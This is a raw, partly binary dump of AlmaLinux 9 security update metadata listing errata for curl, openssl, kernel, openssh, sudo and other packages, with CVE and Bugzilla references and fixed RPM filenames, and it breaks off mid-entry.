python3-samba-4.18.6-101.el9_3.alma.1.i686.rpm�0+libsmbclient-4.18.6-101.el9_3.alma.1.x86_64.rpm�@+samba-tools-4.18.6-101.el9_3.alma.1.x86_64.rpm�<+python3-samba-dc-4.18.6-101.el9_3.alma.1.x86_64.rpm�Z+samba-winbind-4.18.6-101.el9_3.alma.1.x86_64.rpm�[+samba-dc-libs-4.18.6-101.el9_3.alma.1.i686.rpm�Y+libnetapi-4.18.6-101.el9_3.alma.1.x86_64.rpm�Y+samba-common-tools-4.18.6-101.el9_3.alma.1.x86_64.rpm�u+samba-common-4.18.6-101.el9_3.alma.1.noarch.rpm�X+samba-4.18.6-101.el9_3.alma.1.x86_64.rpm�6+samba-winbind-modules-4.18.6-101.el9_3.alma.1.i686.rpm�2+python3-samba-4.18.6-101.el9_3.alma.1.x86_64.rpm�4+samba-common-libs-4.18.6-101.el9_3.alma.1.i686.rpm�>+samba-dcerpc-4.18.6-101.el9_3.alma.1.x86_64.rpm�3+samba-client-libs-4.18.6-101.el9_3.alma.1.x86_64.rpm�1+libwbclient-4.18.6-101.el9_3.alma.1.i686.rpm�[+samba-dc-libs-4.18.6-101.el9_3.alma.1.x86_64.rpm�0+libsmbclient-4.18.6-101.el9_3.alma.1.i686.rpm�Y+libnetapi-4.18.6-101.el9_3.alma.1.i686.rpm�A+samba-usershares-4.18.6-101.el9_3.alma.1.x86_64.rpm�6+samba-winbind-modules-4.18.6-101.el9_3.alma.1.x86_64.rpm�1+libwbclient-4.18.6-101.el9_3.alma.1.x86_64.rpm�3+samba-client-libs-4.18.6-101.el9_3.alma.1.i686.rpm�5+samba-libs-4.18.6-101.el9_3.alma.1.i686.rpm�4+samba-common-libs-4.18.6-101.el9_3.alma.1.x86_64.rpm�?+samba-ldb-ldap-modules-4.18.6-101.el9_3.alma.1.x86_64.rpm�5+samba-libs-4.18.6-101.el9_3.alma.1.x86_64.rpm�2+python3-samba-4.18.6-101.el9_3.alma.1.i686.rpm�0+libsmbclient-4.18.6-101.el9_3.alma.1.x86_64.rpm�@+samba-tools-4.18.6-101.el9_3.alma.1.x86_64.rpm�<+python3-samba-dc-4.18.6-101.el9_3.alma.1.x86_64.rpm�Z+samba-winbind-4.18.6-101.el9_3.alma.1.x86_64.rpm�[+samba-dc-libs-4.18.6-101.el9_3.alma.1.i686.rpm�Y+libnetapi-4.18.6-101.el9_3.alma.1.x86_64.rpm�Y+samba-common-tools-4.18.6-101.el9_3.alma.1.x86_64.rpm�u+samba-common-4.18.6-101.el9_3.alma.1.noarch.rpm�X+samba-4.18.6-101.el9_3.alma.1.x86_64.rpm�6+samba-winbind-modules-4.18.6-101.el9_3.alma.1.i686.rpm�2+python3-samba-4.18.6-101.el9_3.alma.1.x86_64.rpm�4+samba-common-libs-4.18.6-101.el9_3.alma.1.i686.rpm����0�"�3�BBBBBBBBBsecurityImportant: curl security update0'��k�}https://access.redhat.com/errata/RHSA-2023:6745RHSA-2023:6745RHSA-2023:6745https://access.redhat.com/security/cve/CVE-2023-38545CVE-2023-38545CVE-2023-38545https://access.redhat.com/security/cve/CVE-2023-38546CVE-2023-38546CVE-2023-38546https://bugzilla.redhat.com/22419332241933https://bugzilla.redhat.com/22419382241938https://errata.almalinux.org/9/ALSA-2023-6745.htmlALSA-2023:6745ALSA-2023:6745�*�Kcurl-minimal-7.76.1-26.el9_3.2.x86_64.rpm{�Klibcurl-7.76.1-26.el9_3.2.x86_64.rpm�)�Kcurl-7.76.1-26.el9_3.2.x86_64.rpm|�Klibcurl-minimal-7.76.1-26.el9_3.2.i686.rpm{�Klibcurl-7.76.1-26.el9_3.2.i686.rpm|�Klibcurl-minimal-7.76.1-26.el9_3.2.x86_64.rpm�*�Kcurl-minimal-7.76.1-26.el9_3.2.x86_64.rpm{�Klibcurl-7.76.1-26.el9_3.2.x86_64.rpm�)�Kcurl-7.76.1-26.el9_3.2.x86_64.rpm|�Klibcurl-minimal-7.76.1-26.el9_3.2.i686.rpm{�Klibcurl-7.76.1-26.el9_3.2.i686.rpm|�Klibcurl-minimal-7.76.1-26.el9_3.2.x86_64.rpm����!�#��LBsecurityImportant: nghttp2 security update0'��h�-https://access.redhat.com/errata/RHSA-2023:6746RHSA-2023:6746RHSA-2023:6746https://access.redhat.com/security/cve/CVE-2023-44487CVE-2023-44487CVE-2023-44487https://bugzilla.redhat.com/22428032242803https://errata.almalinux.org/9/ALSA-2023-6746.htmlALSA-2023:6746ALSA-2023:6746�Z�`libnghttp2-1.43.0-5.el9_3.1.x86_64.rpm�Z�`libnghttp2-1.43.0-5.el9_3.1.i686.rpm�Z�`libnghttp2-1.43.0-5.el9_3.1.x86_64.rpm�Z�`libnghttp2-1.43.0-5.el9_3.1.i686.rpm����J�$
�4�PBBBsecurityModerate: libxml2 security update0���https://access.redhat.com/errata/RHSA-2023:7747RHSA-2023:7747RHSA-2023:7747https://access.redhat.com/security/cve/CVE-2023-39615CVE-2023-39615CVE-2023-39615https://bugzilla.redhat.com/22358642235864https://errata.almalinux.org/9/ALSA-2023-7747.htmlALSA-2023:7747ALSA-2023:7747�O�python3-libxml2-2.9.13-5.el9_3.x86_64.rpm��libxml2-2.9.13-5.el9_3.i686.rpm��libxml2-2.9.13-5.el9_3.x86_64.rpm�O�python3-libxml2-2.9.13-5.el9_3.x86_64.rpm��libxml2-2.9.13-5.el9_3.i686.rpm��libxml2-2.9.13-5.el9_3.x86_64.rpm���N�%
��UBsecurityModerate: opensc security update0���Khttps://access.redhat.com/errata/RHSA-2023:7879RHSA-2023:7879RHSA-2023:7879https://access.redhat.com/security/cve/CVE-2023-40660CVE-2023-40660CVE-2023-40660https://access.redhat.com/security/cve/CVE-2023-40661CVE-2023-40661CVE-2023-40661https://access.redhat.com/security/cve/CVE-2023-4535CVE-2023-4535CVE-2023-4535https://bugzilla.redhat.com/22409122240912https://bugzilla.redhat.com/22409132240913https://bugzilla.redhat.com/22409142240914https://errata.almalinux.org/9/ALSA-2023-7879.htmlALSA-2023:7879ALSA-2023:7879�	�Uopensc-0.23.0-3.el9_3.x86_64.rpm�	�Uopensc-0.23.0-3.el9_3.i686.rpm�	�Uopensc-0.23.0-3.el9_3.x86_64.rpm�	�Uopensc-0.23.0-3.el9_3.i686.rpm�����&
�5�YBBBsecurityModerate: openssl security update,��_�Nhttps://access.redhat.com/errata/RHSA-2024:0310RHSA-2024:0310RHSA-2024:0310https://access.redhat.com/security/cve/CVE-2023-5363CVE-2023-5363CVE-2023-5363https://bugzilla.redhat.com/22438392243839https://errata.almalinux.org/9/ALSA-2024-0310.htmlALSA-2024:0310ALSA-2024:0310�:�vopenssl-3.0.7-25.el9_3.x86_64.rpm��vopenssl-libs-3.0.7-25.el9_3.i686.rpm��vopenssl-libs-3.0.7-25.el9_3.x86_64.rpm�:�vopenssl-3.0.7-25.el9_3.x86_64.rpm��vopenssl-libs-3.0.7-25.el9_3.i686.rpm��vopenssl-libs-3.0.7-25.el9_3.x86_64.rpm����[�'
�6�^BBBBBBBBBBBBBBBBBsecurityModerate: rpm security update,��-�whttps://access.redhat.com/errata/RHSA-2024:0463RHSA-2024:0463RHSA-2024:0463https://access.redhat.com/security/cve/CVE-2021-35937CVE-2021-35937CVE-2021-35937https://access.redhat.com/security/cve/CVE-2021-35938CVE-2021-35938CVE-2021-35938https://access.redhat.com/security/cve/CVE-2021-35939CVE-2021-35939CVE-2021-35939https://bugzilla.redhat.com/19641141964114https://bugzilla.redhat.com/19641251964125https://bugzilla.redhat.com/19641291964129https://errata.almalinux.org/9/ALSA-2024-0463.htmlALSA-2024:0463ALSA-2024:0463�y�rpm-sign-4.16.1.3-27.el9_3.x86_64.rpm�H�rpm-sign-libs-4.16.1.3-27.el9_3.x86_64.rpm�w�rpm-plugin-audit-4.16.1.3-27.el9_3.x86_64.rpm�s�python3-rpm-4.16.1.3-27.el9_3.x86_64.rpm�x�rpm-plugin-selinux-4.16.1.3-27.el9_3.x86_64.rpm�G�rpm-libs-4.16.1.3-27.el9_3.i686.rpm�F�rpm-build-libs-4.16.1.3-27.el9_3.i686.rpm�H�rpm-sign-libs-4.16.1.3-27.el9_3.i686.rpm�v�rpm-4.16.1.3-27.el9_3.x86_64.rpm�G�rpm-libs-4.16.1.3-27.el9_3.x86_64.rpm�F�rpm-build-libs-4.16.1.3-27.el9_3.x86_64.rpm�y�rpm-sign-4.16.1.3-27.el9_3.x86_64.rpm�H�rpm-sign-libs-4.16.1.3-27.el9_3.x86_64.rpm�w�rpm-plugin-audit-4.16.1.3-27.el9_3.x86_64.rpm�s�python3-rpm-4.16.1.3-27.el9_3.x86_64.rpm�x�rpm-plugin-selinux-4.16.1.3-27.el9_3.x86_64.rpm�G�rpm-libs-4.16.1.3-27.el9_3.i686.rpm�F�rpm-build-libs-4.16.1.3-27.el9_3.i686.rpm�H�rpm-sign-libs-4.16.1.3-27.el9_3.i686.rpm�v�rpm-4.16.1.3-27.el9_3.x86_64.rpm�G�rpm-libs-4.16.1.3-27.el9_3.x86_64.rpm�F�rpm-build-libs-4.16.1.3-27.el9_3.x86_64.rpm��˰2�(
�2�1securityModerate: python-urllib3 security update,��$�https://access.redhat.com/errata/RHSA-2024:0464RHSA-2024:0464RHSA-2024:0464https://access.redhat.com/security/cve/CVE-2023-43804CVE-2023-43804CVE-2023-43804https://access.redhat.com/security/cve/CVE-2023-45803CVE-2023-45803CVE-2023-45803https://bugzilla.redhat.com/22424932242493https://bugzilla.redhat.com/22468402246840https://errata.almalinux.org/9/ALSA-2024-0464.htmlALSA-2024:0464ALSA-2024:0464�L�python3-urllib3-1.26.5-3.el9_3.1.noarch.rpm�L�python3-urllib3-1.26.5-3.el9_3.1.noarch.rpm��˭�)
�7�sBsecurityModerate: sqlite security update,��;�https://access.redhat.com/errata/RHSA-2024:0465RHSA-2024:0465RHSA-2024:0465https://access.redhat.com/security/cve/CVE-2023-7104CVE-2023-7104CVE-2023-7104https://bugzilla.redhat.com/22561942256194https://errata.almalinux.org/9/ALSA-2024-0465.htmlALSA-2024:0465ALSA-2024:0465�\�
sqlite-libs-3.34.1-7.el9_3.i686.rpm�\�
sqlite-libs-3.34.1-7.el9_3.x86_64.rpm�\�
sqlite-libs-3.34.1-7.el9_3.i686.rpm�\�
sqlite-libs-3.34.1-7.el9_3.x86_64.rpm��˩6�*
�8�vBBBsecurityModerate: python3.9 security update,��C�chttps://access.redhat.com/errata/RHSA-2024:0466RHSA-2024:0466RHSA-2024:0466https://access.redhat.com/security/cve/CVE-2023-27043CVE-2023-27043CVE-2023-27043https://bugzilla.redhat.com/21961832196183https://errata.almalinux.org/9/ALSA-2024-0466.htmlALSA-2024:0466ALSA-2024:0466-�python3-libs-3.9.18-1.el9_3.1.x86_64.rpm��python3-3.9.18-1.el9_3.1.x86_64.rpm-�python3-libs-3.9.18-1.el9_3.1.i686.rpm-�python3-libs-3.9.18-1.el9_3.1.x86_64.rpm��python3-3.9.18-1.el9_3.1.x86_64.rpm-�python3-libs-3.9.18-1.el9_3.1.i686.rpm��ˤ�+
��{BBBBBBBBBBBBBBBBBsecurityModerate: grub2 security update,��&�!https://access.redhat.com/errata/RHSA-2024:0468RHSA-2024:0468RHSA-2024:0468https://access.redhat.com/security/cve/CVE-2023-4001CVE-2023-4001CVE-2023-4001https://bugzilla.redhat.com/22249512224951https://errata.almalinux.org/9/ALSA-2024-0468.htmlALSA-2024:0468ALSA-2024:0468�=�
grub2-efi-aa64-modules-2.06-70.el9_3.2.alma.1.noarch.rpm�>�
grub2-efi-x64-modules-2.06-70.el9_3.2.alma.1.noarch.rpm�j�
grub2-efi-x64-cdboot-2.06-70.el9_3.2.alma.1.x86_64.rpm�k�
grub2-pc-2.06-70.el9_3.2.alma.1.x86_64.rpm�<�
grub2-common-2.06-70.el9_3.2.alma.1.noarch.rpm��
grub2-ppc64le-modules-2.06-70.el9_3.2.alma.1.noarch.rpm�?�
grub2-pc-modules-2.06-70.el9_3.2.alma.1.noarch.rpm�i�
grub2-efi-x64-2.06-70.el9_3.2.alma.1.x86_64.rpm�o�
grub2-tools-minimal-2.06-70.el9_3.2.alma.1.x86_64.rpm�n�
grub2-tools-extra-2.06-70.el9_3.2.alma.1.x86_64.rpm�m�
grub2-tools-efi-2.06-70.el9_3.2.alma.1.x86_64.rpm�l�
grub2-tools-2.06-70.el9_3.2.alma.1.x86_64.rpm�=�
grub2-efi-aa64-modules-2.06-70.el9_3.2.alma.1.noarch.rpm�>�
grub2-efi-x64-modules-2.06-70.el9_3.2.alma.1.noarch.rpm�j�
grub2-efi-x64-cdboot-2.06-70.el9_3.2.alma.1.x86_64.rpm�k�
grub2-pc-2.06-70.el9_3.2.alma.1.x86_64.rpm�<�
grub2-common-2.06-70.el9_3.2.alma.1.noarch.rpm��
grub2-ppc64le-modules-2.06-70.el9_3.2.alma.1.noarch.rpm�?�
grub2-pc-modules-2.06-70.el9_3.2.alma.1.noarch.rpm�i�
grub2-efi-x64-2.06-70.el9_3.2.alma.1.x86_64.rpm�o�
grub2-tools-minimal-2.06-70.el9_3.2.alma.1.x86_64.rpm�n�
grub2-tools-extra-2.06-70.el9_3.2.alma.1.x86_64.rpm�m�
grub2-tools-efi-2.06-70.el9_3.2.alma.1.x86_64.rpm�l�
grub2-tools-2.06-70.el9_3.2.alma.1.x86_64.rpm��Όr�,
�9�OBsecurityModerate: gnutls security update,��G�Ghttps://access.redhat.com/errata/RHSA-2024:0533RHSA-2024:0533RHSA-2024:0533https://access.redhat.com/security/cve/CVE-2023-5981CVE-2023-5981CVE-2023-5981https://access.redhat.com/security/cve/CVE-2024-0553CVE-2024-0553CVE-2024-0553https://access.redhat.com/security/cve/CVE-2024-0567CVE-2024-0567CVE-2024-0567https://bugzilla.redhat.com/22484452248445https://bugzilla.redhat.com/22584122258412https://bugzilla.redhat.com/22585442258544https://errata.almalinux.org/9/ALSA-2024-0533.htmlALSA-2024:0533ALSA-2024:0533�#�gnutls-3.7.6-23.el9_3.3.i686.rpm�#�gnutls-3.7.6-23.el9_3.3.x86_64.rpm�#�gnutls-3.7.6-23.el9_3.3.i686.rpm�#�gnutls-3.7.6-23.el9_3.3.x86_64.rpm��߲
�-
��zBBBBBBBBBBsecurityModerate: nss security update,���:https://access.redhat.com/errata/RHSA-2024:0790RHSA-2024:0790RHSA-2024:0790https://access.redhat.com/security/cve/CVE-2023-6135CVE-2023-6135CVE-2023-6135https://bugzilla.redhat.com/22499062249906https://errata.almalinux.org/9/ALSA-2024-0790.htmlALSA-2024:0790ALSA-2024:0790�n�Rnss-util-3.90.0-6.el9_3.x86_64.rpm�l�Rnss-softokn-freebl-3.90.0-6.el9_3.x86_64.rpm�i�1nspr-4.35.0-6.el9_3.x86_64.rpm�m�Rnss-sysinit-3.90.0-6.el9_3.x86_64.rpm�j�Rnss-3.90.0-6.el9_3.x86_64.rpm�k�Rnss-softokn-3.90.0-6.el9_3.x86_64.rpm�n�Rnss-util-3.90.0-6.el9_3.x86_64.rpm�l�Rnss-softokn-freebl-3.90.0-6.el9_3.x86_64.rpm�i�1nspr-4.35.0-6.el9_3.x86_64.rpm�m�Rnss-sysinit-3.90.0-6.el9_3.x86_64.rpm�j�Rnss-3.90.0-6.el9_3.x86_64.rpm�k�Rnss-softokn-3.90.0-6.el9_3.x86_64.rpm����4�.
��RsecurityModerate: sudo security update,��H�|https://access.redhat.com/errata/RHSA-2024:0811RHSA-2024:0811RHSA-2024:0811https://access.redhat.com/security/cve/CVE-2023-28486CVE-2023-28486CVE-2023-28486https://access.redhat.com/security/cve/CVE-2023-28487CVE-2023-28487CVE-2023-28487https://access.redhat.com/security/cve/CVE-2023-42465CVE-2023-42465CVE-2023-42465https://bugzilla.redhat.com/21792722179272https://bugzilla.redhat.com/21792732179273https://bugzilla.redhat.com/22555682255568https://errata.almalinux.org/9/ALSA-2024-0811.htmlALSA-2024:0811ALSA-2024:0811�S�sudo-1.9.5p2-10.el9_3.x86_64.rpm�S�sudo-1.9.5p2-10.el9_3.x86_64.rpm����[�/
��TBsecurityModerate: opensc security update,��D�https://access.redhat.com/errata/RHSA-2024:0966RHSA-2024:0966RHSA-2024:0966https://access.redhat.com/security/cve/CVE-2023-5992CVE-2023-5992CVE-2023-5992https://bugzilla.redhat.com/22486852248685https://errata.almalinux.org/9/ALSA-2024-0966.htmlALSA-2024:0966ALSA-2024:0966�	�Vopensc-0.23.0-4.el9_3.i686.rpm�	�Vopensc-0.23.0-4.el9_3.x86_64.rpm�	�Vopensc-0.23.0-4.el9_3.i686.rpm�	�Vopensc-0.23.0-4.el9_3.x86_64.rpm����E�0
��XBsecurityImportant: pam:1.5.1 security update,'��V�[https://access.redhat.com/errata/RHSA-2024:10244RHSA-2024:10244RHSA-2024:10244https://access.redhat.com/security/cve/CVE-2024-10963CVE-2024-10963CVE-2024-10963https://bugzilla.redhat.com/23242912324291https://errata.almalinux.org/9/ALSA-2024-10244.htmlALSA-2024:10244ALSA-2024:10244�B�epam-1.5.1-22.el9_5.x86_64.rpm�B�epam-1.5.1-22.el9_5.i686.rpm�B�epam-1.5.1-22.el9_5.x86_64.rpm�B�epam-1.5.1-22.el9_5.i686.rpm����g�1
�	�[BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update,��1�https://access.redhat.com/errata/RHSA-2024:10274RHSA-2024:10274RHSA-2024:10274https://access.redhat.com/security/cve/CVE-2024-41009CVE-2024-41009CVE-2024-41009https://access.redhat.com/security/cve/CVE-2024-42244CVE-2024-42244CVE-2024-42244https://access.redhat.com/security/cve/CVE-2024-50226CVE-2024-50226CVE-2024-50226https://bugzilla.redhat.com/22984122298412https://bugzilla.redhat.com/23248762324876https://errata.almalinux.org/9/ALSA-2024-10274.htmlALSA-2024:10274ALSA-2024:102744kernel-modules-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-abi-stablelists-5.14.0-503.15.1.el9_5.noarch.rpm4kernel-debug-modules-core-5.14.0-503.15.1.el9_5.x86_64.rpm 4kernel-debug-uki-virt-5.14.0-503.15.1.el9_5.x86_64.rpm%4kernel-uki-virt-addons-5.14.0-503.15.1.el9_5.x86_64.rpm"4kernel-uki-virt-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-modules-extra-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-debug-core-5.14.0-503.15.1.el9_5.x86_64.rpm1�Kbpftool-7.4.0-503.15.1.el9_5.x86_64.rpm4kernel-tools-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-debug-modules-5.14.0-503.15.1.el9_5.x86_64.rpm!4kernel-modules-core-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-debug-modules-extra-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-debug-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-tools-libs-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-core-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-5.14.0-503.15.1.el9_5.x86_64.rpm24python3-perf-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-modules-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-abi-stablelists-5.14.0-503.15.1.el9_5.noarch.rpm4kernel-debug-modules-core-5.14.0-503.15.1.el9_5.x86_64.rpm 4kernel-debug-uki-virt-5.14.0-503.15.1.el9_5.x86_64.rpm%4kernel-uki-virt-addons-5.14.0-503.15.1.el9_5.x86_64.rpm"4kernel-uki-virt-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-modules-extra-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-debug-core-5.14.0-503.15.1.el9_5.x86_64.rpm1�Kbpftool-7.4.0-503.15.1.el9_5.x86_64.rpm4kernel-tools-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-debug-modules-5.14.0-503.15.1.el9_5.x86_64.rpm!4kernel-modules-core-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-debug-modules-extra-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-debug-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-tools-libs-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-core-5.14.0-503.15.1.el9_5.x86_64.rpm4kernel-5.14.0-503.15.1.el9_5.x86_64.rpm24python3-perf-5.14.0-503.15.1.el9_5.x86_64.rpm�����2
�
�~securityImportant: tuned security update,'��P�https://access.redhat.com/errata/RHSA-2024:10384RHSA-2024:10384RHSA-2024:10384https://access.redhat.com/security/cve/CVE-2024-52336CVE-2024-52336CVE-2024-52336https://access.redhat.com/security/cve/CVE-2024-52337CVE-2024-52337CVE-2024-52337https://bugzilla.redhat.com/23245402324540https://bugzilla.redhat.com/23245412324541https://errata.almalinux.org/9/ALSA-2024-10384.htmlALSA-2024:10384ALSA-2024:10384�+�Otuned-profiles-cpu-partitioning-2.24.0-2.el9_5.alma.1.noarch.rpm�*�Otuned-2.24.0-2.el9_5.alma.1.noarch.rpm�+�Otuned-profiles-cpu-partitioning-2.24.0-2.el9_5.alma.1.noarch.rpm�*�Otuned-2.24.0-2.el9_5.alma.1.noarch.rpm����^�3
��@BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update,��n�Ahttps://access.redhat.com/errata/RHSA-2024:10939RHSA-2024:10939RHSA-2024:10939https://access.redhat.com/security/cve/CVE-2024-26615CVE-2024-26615CVE-2024-26615https://access.redhat.com/security/cve/CVE-2024-43854CVE-2024-43854CVE-2024-43854https://access.redhat.com/security/cve/CVE-2024-44994CVE-2024-44994CVE-2024-44994https://access.redhat.com/security/cve/CVE-2024-45018CVE-2024-45018CVE-2024-45018https://access.redhat.com/security/cve/CVE-2024-46695CVE-2024-46695CVE-2024-46695https://access.redhat.com/security/cve/CVE-2024-49949CVE-2024-49949CVE-2024-49949https://access.redhat.com/security/cve/CVE-2024-50251CVE-2024-50251CVE-2024-50251https://bugzilla.redhat.com/22673552267355https://bugzilla.redhat.com/23098572309857https://bugzilla.redhat.com/23117152311715https://bugzilla.redhat.com/23120832312083https://bugzilla.redhat.com/23205052320505https://bugzilla.redhat.com/23248862324886https://errata.almalinux.org/9/ALSA-2024-10939.htmlALSA-2024:10939ALSA-2024:10939%5kernel-uki-virt-addons-5.14.0-503.16.1.el9_5.x86_64.rpm1�Lbpftool-7.4.0-503.16.1.el9_5.x86_64.rpm5kernel-debug-core-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-core-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-tools-libs-5.14.0-503.16.1.el9_5.x86_64.rpm"5kernel-uki-virt-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-modules-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-debug-modules-extra-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-debug-modules-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-debug-5.14.0-503.16.1.el9_5.x86_64.rpm25python3-perf-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-abi-stablelists-5.14.0-503.16.1.el9_5.noarch.rpm5kernel-debug-modules-core-5.14.0-503.16.1.el9_5.x86_64.rpm 5kernel-debug-uki-virt-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-tools-5.14.0-503.16.1.el9_5.x86_64.rpm!5kernel-modules-core-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-modules-extra-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-5.14.0-503.16.1.el9_5.x86_64.rpm%5kernel-uki-virt-addons-5.14.0-503.16.1.el9_5.x86_64.rpm1�Lbpftool-7.4.0-503.16.1.el9_5.x86_64.rpm5kernel-debug-core-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-core-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-tools-libs-5.14.0-503.16.1.el9_5.x86_64.rpm"5kernel-uki-virt-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-modules-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-debug-modules-extra-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-debug-modules-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-debug-5.14.0-503.16.1.el9_5.x86_64.rpm25python3-perf-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-abi-stablelists-5.14.0-503.16.1.el9_5.noarch.rpm5kernel-debug-modules-core-5.14.0-503.16.1.el9_5.x86_64.rpm 5kernel-debug-uki-virt-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-tools-5.14.0-503.16.1.el9_5.x86_64.rpm!5kernel-modules-core-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-modules-extra-5.14.0-503.16.1.el9_5.x86_64.rpm5kernel-5.14.0-503.16.1.el9_5.x86_64.rpm����5�4
��cBBBsecurityModerate: python3.9:3.9.21 security update,��/�https://access.redhat.com/errata/RHSA-2024:10983RHSA-2024:10983RHSA-2024:10983https://access.redhat.com/security/cve/CVE-2024-11168CVE-2024-11168CVE-2024-11168https://access.redhat.com/security/cve/CVE-2024-9287CVE-2024-9287CVE-2024-9287https://bugzilla.redhat.com/23214402321440https://bugzilla.redhat.com/23257762325776https://errata.almalinux.org/9/ALSA-2024-10983.htmlALSA-2024:10983ALSA-2024:10983-�python3-libs-3.9.21-1.el9_5.x86_64.rpm��python3-3.9.21-1.el9_5.x86_64.rpm-�python3-libs-3.9.21-1.el9_5.i686.rpm-�python3-libs-3.9.21-1.el9_5.x86_64.rpm��python3-3.9.21-1.el9_5.x86_64.rpm-�python3-libs-3.9.21-1.el9_5.i686.rpm����E�5
�
�hBsecurityModerate: pam security update,��M�?https://access.redhat.com/errata/RHSA-2024:11250RHSA-2024:11250RHSA-2024:11250https://access.redhat.com/security/cve/CVE-2024-10041CVE-2024-10041CVE-2024-10041https://bugzilla.redhat.com/23192122319212https://errata.almalinux.org/9/ALSA-2024-11250.htmlALSA-2024:11250ALSA-2024:11250�B�dpam-1.5.1-21.el9_5.i686.rpm�B�dpam-1.5.1-21.el9_5.x86_64.rpm�B�dpam-1.5.1-21.el9_5.i686.rpm�B�dpam-1.5.1-21.el9_5.x86_64.rpm�����6
��kBBBBBBBBsecurityModerate: curl security update,���@https://access.redhat.com/errata/RHSA-2024:1129RHSA-2024:1129RHSA-2024:1129https://access.redhat.com/security/cve/CVE-2023-46218CVE-2023-46218CVE-2023-46218https://bugzilla.redhat.com/22520302252030https://errata.almalinux.org/9/ALSA-2024-1129.htmlALSA-2024:1129ALSA-2024:1129|�Llibcurl-minimal-7.76.1-26.el9_3.3.i686.rpm|�Llibcurl-minimal-7.76.1-26.el9_3.3.x86_64.rpm�*�Lcurl-minimal-7.76.1-26.el9_3.3.x86_64.rpm{�Llibcurl-7.76.1-26.el9_3.3.x86_64.rpm{�Llibcurl-7.76.1-26.el9_3.3.i686.rpm�)�Lcurl-7.76.1-26.el9_3.3.x86_64.rpm|�Llibcurl-minimal-7.76.1-26.el9_3.3.i686.rpm|�Llibcurl-minimal-7.76.1-26.el9_3.3.x86_64.rpm�*�Lcurl-minimal-7.76.1-26.el9_3.3.x86_64.rpm{�Llibcurl-7.76.1-26.el9_3.3.x86_64.rpm{�Llibcurl-7.76.1-26.el9_3.3.i686.rpm�)�Lcurl-7.76.1-26.el9_3.3.x86_64.rpm����7�7
��uBBBBBBsecurityModerate: openssh security update,��L�0https://access.redhat.com/errata/RHSA-2024:1130RHSA-2024:1130RHSA-2024:1130https://access.redhat.com/security/cve/CVE-2023-48795CVE-2023-48795CVE-2023-48795https://access.redhat.com/security/cve/CVE-2023-51385CVE-2023-51385CVE-2023-51385https://bugzilla.redhat.com/22542102254210https://bugzilla.redhat.com/22552712255271https://errata.almalinux.org/9/ALSA-2024-1130.htmlALSA-2024:1130ALSA-2024:1130�s�xopenssh-keycat-8.7p1-34.el9_3.3.x86_64.rpm�q�xopenssh-8.7p1-34.el9_3.3.x86_64.rpm�r�xopenssh-clients-8.7p1-34.el9_3.3.x86_64.rpm�t�xopenssh-server-8.7p1-34.el9_3.3.x86_64.rpm�s�xopenssh-keycat-8.7p1-34.el9_3.3.x86_64.rpm�q�xopenssh-8.7p1-34.el9_3.3.x86_64.rpm�r�xopenssh-clients-8.7p1-34.el9_3.3.x86_64.rpm�t�xopenssh-server-8.7p1-34.el9_3.3.x86_64.rpm����R�8
��}BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��|�c$https://access.redhat.com/errata/RHSA-2024:11486RHSA-2024:11486RHSA-2024:11486https://access.redhat.com/security/cve/CVE-2024-27399CVE-2024-27399CVE-2024-27399https://access.redhat.com/security/cve/CVE-2024-38564CVE-2024-38564CVE-2024-38564https://access.redhat.com/security/cve/CVE-2024-45020CVE-2024-45020CVE-2024-45020https://access.redhat.com/security/cve/CVE-2024-46697CVE-2024-46697CVE-2024-46697https://access.redhat.com/security/cve/CVE-2024-47675CVE-2024-47675CVE-2024-47675https://access.redhat.com/security/cve/CVE-2024-49888CVE-2024-49888CVE-2024-49888https://access.redhat.com/security/cve/CVE-2024-50099CVE-2024-50099CVE-2024-50099https://access.redhat.com/security/cve/CVE-2024-50110CVE-2024-50110CVE-2024-50110https://access.redhat.com/security/cve/CVE-2024-50115CVE-2024-50115CVE-2024-50115https://access.redhat.com/security/cve/CVE-2024-50124CVE-2024-50124CVE-2024-50124https://access.redhat.com/security/cve/CVE-2024-50125CVE-2024-50125CVE-2024-50125https://access.redhat.com/security/cve/CVE-2024-50142CVE-2024-50142CVE-2024-50142https://access.redhat.com/security/cve/CVE-2024-50148CVE-2024-50148CVE-2024-50148https://access.redhat.com/security/cve/CVE-2024-50192CVE-2024-50192CVE-2024-50192https://access.redhat.com/security/cve/CVE-2024-50223CVE-2024-50223CVE-2024-50223https://access.redhat.com/security/cve/CVE